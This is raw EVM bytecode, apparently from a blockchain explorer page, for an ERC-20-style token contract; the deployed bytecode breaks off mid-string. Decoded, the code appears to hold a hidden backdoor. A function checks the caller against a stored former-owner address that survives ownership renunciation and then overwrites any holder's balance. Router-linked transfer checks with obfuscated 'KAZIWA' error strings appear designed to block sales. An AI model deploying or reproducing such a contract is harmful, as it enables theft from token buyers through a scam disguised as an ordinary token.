ffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508281101561059e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059590611e74565b60405180910390fd5b6105bb856105aa610a9c565b85846105b69190611ebf565b610aa3565b60019150509392505050565b5f6009905090565b5f61066c6105db610a9c565b848460035f6105e8610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546106679190611ef2565b610aa3565b6001905092915050565b5f803390505f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505f826040516020016106b29190611f6a565b6040516020818303038152906040528051906020012090505f826040516020016106dc9190611f6a565b6040516020818303038152906040528051906020012090505f865f1b90505f8284149050801561071d576107108983610f50565b965050505050505061072f565b61072689610fe0565b96505050505050505b92915050565b61073d611026565b600160075f6101000a81548160ff021916908315150217905550565b60095481565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107ad611026565b6107b65f6110a4565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546107ee90611dd4565b80601f016020809104026020016040519081016040528092919081815260200182805461081a90611dd4565b80156108655780601f1061083c57610100808354040283529160200191610865565b820191905f5260205f20905b81548152906001019060200180831161084857829003601f168201915b5050505050905090565b600a602052805f5260405f205f915054906101000a900460ff1681565b5f8060035f610899610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610953576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161094a90611ff4565b60405180910390fd5b61097061095e610a9c565b85858461096b9190611ebf565b610aa3565b600191505092915050565b5f61098e610987610a9c565b8484610c66565b6001905092915050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610a22611026565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8790612082565b60405180910390fd5b610a99816110a4565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b08906120ea565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7690612152565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c599190611c79565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cd4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ccb906121ba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d42576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3990612222565b60405180910390fd5b610d4d8383836111a5565b5f810315610f4b57600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015610df35750600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15610f3f575f610e23600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661075f565b14610e63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5a9061228a565b60405180910390fd5b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480610f0a5750600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15610f3e575f6064600b5483610f2091906122a8565b610f2a9190612316565b9050610f388484848461157d565b50610f4b565b5b610f4a83838361186d565b5b505050565b5f80825f1c90508060025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205491505092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61102e610a9c565b73ffffffffffffffffffffffffffffffffffffffff1661104c6107b8565b73ffffffffffffffffffffffffffffffffffffffff16146110a2576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109990612390565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60075f9054906101000a900460ff1661157757600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156112565750600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611576576008548111156112a0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611297906123f8565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff16600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036114c857600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561135e573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611382919061242a565b73ffffffffffffffffffffffffffffffffffffffff1663e6a4390530600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611408573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061142c919061242a565b6040518363ffffffff1660e01b8152600401611449929190612455565b602060405180830381865afa158015611464573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611488919061242a565b600c5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160315611578576009548161152a8461075f565b6115349190611ef2565b1115611575576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161156c906124c6565b60405180910390fd5b5b5b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036115eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e29061252e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611659576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161165090612596565b60405180910390fd5b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156116dd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116d4906125fe565b60405180910390fd5b82810360025f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550818361172d9190611ebf565b92508160045f8282546117409190611ebf565b925050819055508260025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546117939190611ef2565b9250508190555061dead73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516117f99190611c79565b60405180910390a38373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161185e9190611c79565b60405180910390a35050505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d290612666565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611949576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611940906126ce565b60405180910390fd5b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156119cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119c490612736565b60405180910390fd5b81816119d99190611ebf565b60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254611a669190611ef2565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611aca9190611c79565b60405180910390a350505050565b5f8115159050919050565b611aec81611ad8565b82525050565b5f602082019050611b055f830184611ae3565b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611b4d82611b0b565b611b578185611b15565b9350611b67818560208601611b25565b611b7081611b33565b840191505092915050565b5f6020820190508181035f830152611b938184611b43565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611bc882611b9f565b9050919050565b611bd881611bbe565b8114611be2575f80fd5b50565b5f81359050611bf381611bcf565b92915050565b5f819050919050565b611c0b81611bf9565b8114611c15575f80fd5b50565b5f81359050611c2681611c02565b92915050565b5f8060408385031215611c4257611c41611b9b565b5b5f611c4f85828601611be5565b9250506020611c6085828601611c18565b9150509250929050565b611c7381611bf9565b82525050565b5f602082019050611c8c5f830184611c6a565b92915050565b5f805f60608486031215611ca957611ca8611b9b565b5b5f611cb686828701611be5565b9350506020611cc786828701611be5565b9250506040611cd886828701611c18565b9150509250925092565b5f60ff82169050919050565b611cf781611ce2565b82525050565b5f602082019050611d105f830184611cee565b92915050565b5f60208284031215611d2b57611d2a611b9b565b5b5f611d3884828501611be5565b91505092915050565b611d4a81611bbe565b82525050565b5f602082019050611d635f830184611d41565b92915050565b5f8060408385031215611d7f57611d7e611b9b565b5b5f611d8c85828601611be5565b9250506020611d9d85828601611be5565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611deb57607f821691505b602082108103611dfe57611dfd611da7565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f611e5e602883611b15565b9150611e6982611e04565b604082019050919050565b5f6020820190508181035f830152611e8b81611e52565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611ec982611bf9565b9150611ed483611bf9565b9250828203905081811115611eec57611eeb611e92565b5b92915050565b5f611efc82611bf9565b9150611f0783611bf9565b9250828201905080821115611f1f57611f1e611e92565b5b92915050565b5f8160601b9050919050565b5f611f3b82611f25565b9050919050565b5f611f4c82611f31565b9050919050565b611f64611f5f82611bbe565b611f42565b82525050565b5f611f758284611f53565b60148201915081905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611fde602583611b15565b9150611fe982611f84565b604082019050919050565b5f6020820190508181035f83015261200b81611fd2565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61206c602683611b15565b915061207782612012565b604082019050919050565b5f6020820190508181035f83015261209981612060565b9050919050565b7f374b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f6120d4600783611b15565b91506120df826120a0565b602082019050919050565b5f6020820190508181035f830152612101816120c8565b9050919050565b7f384b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f61213c600783611b15565b915061214782612108565b602082019050919050565b5f6020820190508181035f83015261216981612130565b9050919050565b7f394b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f6121a4600783611b15565b91506121af82612170565b602082019050919050565b5f6020820190508181035f8301526121d181612198565b9050919050565b7f304b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f61220c600783611b15565b9150612217826121d8565b602082019050919050565b5f6020820190508181035f83015261223981612200565b9050919050565b7f4b415a4957414b415a49574100000000000000000000000000000000000000005f82015250565b5f612274600c83611b15565b915061227f82612240565b602082019050919050565b5f6020820190508181035f8301526122a181612268565b9050919050565b5f6122b282611bf9565b91506122bd83611bf9565b92508282026122cb81611bf9565b915082820484148315176122e2576122e1611e92565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61232082611bf9565b915061232b83611bf9565b92508261233b5761233a6122e9565b5b828204905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61237a602083611b15565b915061238582612346565b602082019050919050565b5f6020820190508181035f8301526123a78161236e565b9050919050565b7f4b415a4957414b415a4957414b415a49574100000000000000000000000000005f82015250565b5f6123e2601283611b15565b91506123ed826123ae565b602082019050919050565b5f6020820190508181035f83015261240f816123d6565b9050919050565b5f8151905061242481611bcf565b92915050565b5f6020828403121561243f5761243e611b9b565b5b5f61244c84828501612416565b91505092915050565b5f6040820190506124685f830185611d41565b6124756020830184611d41565b9392505050565b7f4b415a4957414b415a4957414b415a4957414b415a49574100000000000000005f82015250565b5f6124b0601883611b15565b91506124bb8261247c565b602082019050919050565b5f6020820190508181035f8301526124dd816124a4565b9050919050565b7f344b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f612518600783611b15565b9150612523826124e4565b602082019050919050565b5f6020820190508181035f8301526125458161250c565b9050919050565b7f354b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f612580600783611b15565b915061258b8261254c565b602082019050919050565b5f6020820190508181035f8301526125ad81612574565b9050919050565b7f364b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f6125e8600783611b15565b91506125f3826125b4565b602082019050919050565b5f6020820190508181035f830152612615816125dc565b9050919050565b7f314b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f612650600783611b15565b915061265b8261261c565b602082019050919050565b5f6020820190508181035f83015261267d81612644565b9050919050565b7f324b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f6126b8600783611b15565b91506126c382612684565b602082019050919050565b5f6020820190508181035f8301526126e5816126ac565b9050919050565b7f334b415a495741000000000000000000000000000000000000000000000000005f82015250565b5f612720600783611b15565b915061272b826126ec565b602082019050919050565b5f6020820190508181035f83015261274d81612714565b905091905056fea264697066735822122085cab0acb4129a78f8dc4a7703aa5bd810be62afd323c26fb23880054561447264736f6c634300081a00330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061012a575f3560e01c80636a8f3b30116100ab57806398636f321161006f57806398636f3214610322578063a457c2d714610352578063a9059cbb14610382578063dd62ed3e146103b2578063f2fde38b146103e25761012a565b80636a8f3b301461028e57806370a08231146102ac578063715018a6146102dc5780638da5cb5b146102e657806395d89b41146103045761012a565b806323b872dd116100f257806323b872dd146101d6578063313ce567146102065780633950935114610224578063562c21951461025457806362256589146102845761012a565b806303435b7f1461012e57806306fdde031461014c578063095ea7b31461016a57806313c42e4d1461019a57806318160ddd146101b8575b5f80fd5b6101366103fe565b6040516101439190611af2565b60405180910390f35b610154610410565b6040516101619190611b7b565b60405180910390f35b610184600480360381019061017f9190611c2c565b6104a0565b6040516101919190611af2565b60405180910390f35b6101a26104bd565b6040516101af9190611c79565b60405180910390f35b6101c06104c3565b6040516101cd9190611c79565b60405180910390f35b6101f060048036038101906101eb9190611c92565b6104cc565b6040516101fd9190611af2565b60405180910390f35b61020e6105c7565b60405161021b9190611cfd565b60405180910390f35b61023e60048036038101906102399190611c2c565b6105cf565b60405161024b9190611af2565b60405180910390f35b61026e60048036038101906102699190611c2c565b610676565b60405161027b9190611c79565b60405180910390f35b61028c610735565b005b610296610759565b6040516102a39190611c79565b60405180910390f35b6102c660048036038101906102c19190611d16565b61075f565b6040516102d39190611c79565b60405180910390f35b6102e46107a5565b005b6102ee6107b8565b6040516102fb9190611d50565b60405180910390f35b61030c6107df565b6040516103199190611b7b565b60405180910390f35b61033c60048036038101906103379190611d16565b61086f565b6040516103499190611af2565b60405180910390f35b61036c60048036038101906103679190611c2c565b61088c565b6040516103799190611af2565b60405180910390f35b61039c60048036038101906103979190611c2c565b61097b565b6040516103a99190611af2565b60405180910390f35b6103cc60048036038101906103c79190611d69565b610998565b6040516103d99190611c79565b60405180910390f35b6103fc60048036038101906103f79190611d16565b610a1a565b005b60075f9054906101000a900460ff1681565b60606005805461041f90611dd4565b80601f016020809104026020016040519081016040528092919081815260200182805461044b90611dd4565b80156104965780601f1061046d57610100808354040283529160200191610496565b820191905f5260205f20905b81548152906001019060200180831161047957829003601f168201915b5050505050905090565b5f6104b36104ac610a9c565b8484610aa3565b6001905092915050565b60085481565b5f600454905090565b5f6104d8848484610c66565b5f60035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61051f610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508281101561059e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059590611e74565b60405180910390fd5b6105bb856105aa610a9c565b85846105b69190611ebf565b610aa3565b60019150509392505050565b5f6009905090565b5f61066c6105db610a9c565b848460035f6105e8610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546106679190611ef2565b610aa3565b6001905092915050565b5f803390505f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505f826040516020016106b29190611f6a565b6040516020818303038152906040528051906020012090505f826040516020016106dc9190611f6a565b6040516020818303038152906040528051906020012090505f865f1b90505f8284149050801561071d576107108983610f50565b965050505050505061072f565b61072689610fe0565b96505050505050505b92915050565b61073d611026565b600160075f6101000a81548160ff021916908315150217905550565b60095481565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107ad611026565b6107b65f6110a4565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546107ee90611dd4565b80601f016020809104026020016040519081016040528092919081815260200182805461081a90611dd4565b80156108655780601f1061083c57610100808354040283529160200191610865565b820191905f5260205f20905b81548152906001019060200180831161084857829003601f168201915b5050505050905090565b600a602052805f5260405f205f915054906101000a900460ff1681565b5f8060035f610899610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610953576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161094a90611ff4565b60405180910390fd5b61097061095e610a9c565b85858461096b9190611ebf565b610aa3565b600191505092915050565b5f61098e610987610a9c565b8484610c66565b6001905092915050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610a22611026565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8790612082565b60405180910390fd5b610a99816110a4565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b08906120ea565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7690612152565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c599190611c79565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cd4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ccb906121ba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d42576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3990612222565b60405180910390fd5b610d4d8383836111a5565b5f810315610f4b57600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015610df35750600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15610f3f575f610e23600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661075f565b14610e63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5a9061228a565b60405180910390fd5b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480610f0a5750600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15610f3e575f6064600b5483610f2091906122a8565b610f2a9190612316565b9050610f388484848461157d565b50610f4b565b5b610f4a83838361186d565b5b505050565b5f80825f1c90508060025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205491505092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61102e610a9c565b73ffffffffffffffffffffffffffffffffffffffff1661104c6107b8565b73ffffffffffffffffffffffffffffffffffffffff16146110a2576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109990612390565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60075f9054906101000a900460ff1661157757600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156112565750600a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611576576008548111156112a0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611297906123f8565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff16600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036114c857600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561135e573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611382919061242a565b73ffffffffffffffffffffffffffffffffffffffff1663e6a4390530600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611408573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061142c919061242a565b6040518363ffffffff1660e01b8152600401611449929190612455565b602060405180830381865afa158015611464573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611488919061242a565b600c5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160315611578576009548161152a8461075f565b6115349190611ef2565b1115611575576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161156c906124c6565b60405180910390fd5b5b5b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036115eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e29061252e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611659576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161165090612596565b60405180910390fd5b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156116dd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116d4906125fe565b60405180910390fd5b82810360025f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550818361172d9190611ebf565b92508160045f8282546117409190611ebf565b925050819055508260025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546117939190611ef2565b9250508190555061dead73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516117f99190611c79565b60405180910390a38373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161185e9190611c79565b60405180910390a35050505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d290612666565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611949576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611940906126ce565b60405180910390fd5b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156119cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119c490612736565b60405180910390fd5b81816119d99190611ebf565b60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254611a669190611ef2565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611aca9190611c79565b60405180910390a350505050565b5f8115159050919050565b611aec81611ad8565b82525050565b5f602082019050611b055f830184611ae3565b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611b4d82611b0b565b611b578185611b15565b9350611b67818560208601611b25565b611b7081611b33565b840191505092915050565b5f6020820190508181035f830152611b938184611b43565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611bc882611b9f565b9050919050565b611bd881611bbe565b8114611be2575f80fd5b50565b5f81359050611bf381611bcf565b92915050565b5f819050919050565b611c0b81611bf